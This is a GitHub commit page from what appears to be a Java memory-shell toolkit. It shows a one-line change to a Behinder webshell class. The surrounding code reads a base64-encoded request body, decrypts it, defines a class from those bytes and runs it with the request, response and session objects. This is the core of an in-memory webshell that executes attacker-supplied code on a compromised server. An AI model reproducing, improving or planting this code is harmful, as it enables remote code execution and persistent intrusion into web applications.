Skip to content

Commit 397e55e

Browse files
committed
fix
1 parent 9b3f57f commit 397e55e

File tree

1 file changed

+1
-1
lines changed
  • memshell/src/main/java/com/reajason/javaweb/memshell/shelltool/behinder

1 file changed

+1
-1
lines changed

memshell/src/main/java/com/reajason/javaweb/memshell/shelltool/behinder/Behinder.java

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -46,7 +46,7 @@ public boolean equals(Object obj) {
4646
map.put("session", session);
4747
String parameter = ((BufferedReader) invokeInternalMethod(request, "getReader")).readLine();
4848
byte[] bytes = x(base64Decode(parameter));
49-
Object instance = (new Behinder(this.getClass().getClassLoader())).g(bytes).newInstance();
49+
Object instance = (new Behinder(Thread.currentThread().getContextClassLoader())).g(bytes).newInstance();
5050
instance.equals(map);
5151
return true;
5252
}

0 commit comments

Comments
 (0)